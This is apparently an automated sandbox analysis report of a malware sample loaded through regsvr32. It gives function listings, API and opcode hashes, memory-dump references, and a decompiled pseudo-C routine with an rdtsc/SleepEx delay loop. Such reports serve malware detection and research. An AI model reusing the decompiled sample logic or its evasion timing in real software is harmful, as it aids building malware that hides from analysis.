                                                                                                                                                                                                                • Source File: 00000004.00000002.2117243734.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117234477.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117252147.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117282688.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117292804.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                                • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                                • API String ID: 1174013218-1650116920
                                                                                                                                                                                                                • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                • Instruction ID: 6608af3ea9cadc71cadd7eaf5fd0afc6bc6969bf4d43f0012be74416a8711f7a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D31F772908B858AE764CF25F84435AB6E2F789364F504039D68C97B78EB7CD158CF40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 000007FEF8F920A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2117243734.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117234477.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117252147.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117282688.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117292804.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 4275171209-2766056989
                                                                                                                                                                                                                • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                • Instruction ID: d852fcecc8c65b33074624bcc973cb4eb89098c5c099dee049a95ff6459d2f31
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF326C76609BC48AD7B5CB56F49079AB7A5F7C9B90F10802AEACD93B18DB38C154CF01
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 001B10AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExitProcessSleepUser
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 354099737-0
                                                                                                                                                                                                                • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                • Instruction ID: b248c92643af6e86a2ba2c5abe2b16d8dab0787f217852e1677af44787d65faf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03C08C30104684D3F31EBB20E8683E93235B300305F424619E303856E08F3C04C8C303
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 000007FEF8F93100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2117243734.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117234477.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117252147.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117282688.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117292804.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                • Instruction ID: 3adc23c25f3a0f1b8435709f589f86897b1c8289c5bdacba1448a615a5bf1034
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19D13F76509BC486D774CB4AE49039AB7A1F3C9790F10902AEACD93B68DF78C094CF40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 001B22DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LookupAccountNameW.ADVAPI32 ref: 001B233C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AccountLookupName
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1484870144-0
                                                                                                                                                                                                                • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                • Instruction ID: 60f7399251d735b1e8cad7b8c0da10334775dee052dc7b02c6ac96509f9298b4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D316972705B418AEB109FB6E8443DA37A4FB48B88F588135EA4D57B29EF38C549C350
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 001B2434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                                                                                			E001B2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E001B11FC(_t73 - 0x29, _t52);
					_t37 = E001B153C(_t73 - 0x29);
					E001B2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E001B1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E001B272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E001B1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E001B2A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                                0x001b2434
                                                                                                                                                                                                                0x001b2434
                                                                                                                                                                                                                0x001b2434
                                                                                                                                                                                                                0x001b2434
                                                                                                                                                                                                                0x001b2434
                                                                                                                                                                                                                0x001b2434
                                                                                                                                                                                                                0x001b2434
                                                                                                                                                                                                                0x001b2439
                                                                                                                                                                                                                0x001b243f
                                                                                                                                                                                                                0x001b244d
                                                                                                                                                                                                                0x001b244d
                                                                                                                                                                                                                0x001b244d
                                                                                                                                                                                                                0x001b2512
                                                                                                                                                                                                                0x001b2528
                                                                                                                                                                                                                0x001b2450
                                                                                                                                                                                                                0x001b2454
                                                                                                                                                                                                                0x001b2456
                                                                                                                                                                                                                0x001b245a
                                                                                                                                                                                                                0x001b2460
                                                                                                                                                                                                                0x001b2468
                                                                                                                                                                                                                0x001b246e
                                                                                                                                                                                                                0x001b2472
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x001b2474
                                                                                                                                                                                                                0x001b2482
                                                                                                                                                                                                                0x001b248c
                                                                                                                                                                                                                0x001b249d
                                                                                                                                                                                                                0x001b249f
                                                                                                                                                                                                                0x001b24a4
                                                                                                                                                                                                                0x001b24a7
                                                                                                                                                                                                                0x001b24b0
                                                                                                                                                                                                                0x001b24bf
                                                                                                                                                                                                                0x001b24c1
                                                                                                                                                                                                                0x001b24cc
                                                                                                                                                                                                                0x001b24d2
                                                                                                                                                                                                                0x001b24d7
                                                                                                                                                                                                                0x001b24db
                                                                                                                                                                                                                0x001b24e0
                                                                                                                                                                                                                0x001b24e2
                                                                                                                                                                                                                0x001b24f0
                                                                                                                                                                                                                0x001b24f0
                                                                                                                                                                                                                0x001b24fc
                                                                                                                                                                                                                0x001b2501
                                                                                                                                                                                                                0x001b2504
                                                                                                                                                                                                                0x001b250d
                                                                                                                                                                                                                0x001b250d
                                                                                                                                                                                                                0x001b2504
                                                                                                                                                                                                                0x001b24cc
                                                                                                                                                                                                                0x001b24bf
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x001b24a7

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                • Instruction ID: c9da4ff87a2bc895bab384596edc4cc2c37c45b21341cafe2a5a99aac0f3a436
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0219272300A409AEF20EFB2E4543ED33A1F798784F994426EE4D57659EF38D549C350
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 001B260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,001B1E13), ref: 001B264B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                                                                • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                • Instruction ID: 62c8b849bfd568ce1ef31c80dc291a9cddc16c83e20172e320ba1ef74a26f57a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EE0ED3262454592EF11FB20E8543D97361FBD8704F844126A95E426A4EF3CCA5DC740
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 001B1000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                • Instruction ID: 8f3362570e4ab31714775b751fca0485858bf91516d18a81d9f787fbf53f0960
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62D0A772E1424083F7309B10EA263DA3311F3D4315FD18206D54944554CF3CC158CA00
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 3068 Parent PID: 1228 regsvr32.exeCOMMON

                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                Function 000007FEF7721370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000006.00000002.2120769781.000007FEF7721000.00000020.00020000.sdmp, Offset: 000007FEF7720000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120761015.000007FEF7720000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120788613.000007FEF7725000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120818332.000007FEF772E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120827808.000007FEF7730000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                                • API String ID: 4275171209-1517691801
                                                                                                                                                                                                                • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                • Instruction ID: 93f30c298b5c7964164163bd4c588135ac9d966b2b59694c45ba5bbc7235fa4f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D151D3B252E6D0CAE3A18B24F49479BBFA0E785348F105158EADD4BB99C7BDC414CF44
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 000007FEF77211B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000006.00000002.2120769781.000007FEF7721000.00000020.00020000.sdmp, Offset: 000007FEF7720000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120761015.000007FEF7720000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120788613.000007FEF7725000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120818332.000007FEF772E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120827808.000007FEF7730000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                                • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                                • API String ID: 1174013218-1650116920
                                                                                                                                                                                                                • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                • Instruction ID: 053ee7fac0097629db9ce58dd1eb48268db7345cf1caafd11c64a34324e2f979
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92310B71929B8186E364CF25F84436AB7E1F789755F504039EA9C87BA8DB7CD044CF40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 000007FEF77220A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000006.00000002.2120769781.000007FEF7721000.00000020.00020000.sdmp, Offset: 000007FEF7720000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120761015.000007FEF7720000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120788613.000007FEF7725000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120818332.000007FEF772E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120827808.000007FEF7730000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 4275171209-2766056989
                                                                                                                                                                                                                • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                • Instruction ID: 43aa99b9715a0bd6f88c42ca9209eb073126373f985ef8870f6fb885057655d4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB326B76619BC48AD7B5CB56F49079AB7A5F789B80F10802AEACC83B58DB7CC154CF01
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 000007FEF7723100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000006.00000002.2120769781.000007FEF7721000.00000020.00020000.sdmp, Offset: 000007FEF7720000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120761015.000007FEF7720000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120788613.000007FEF7725000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120818332.000007FEF772E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120827808.000007FEF7730000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                • Instruction ID: 28384fdfa64e9a1590e72867df3e96ea4f2203e983effc314cfec471290b5093
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80D12E76619BC186D7B4CB59E49039AB7A0F389790F50802AEBCD83B68DF79D494CF40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Non-executed Functions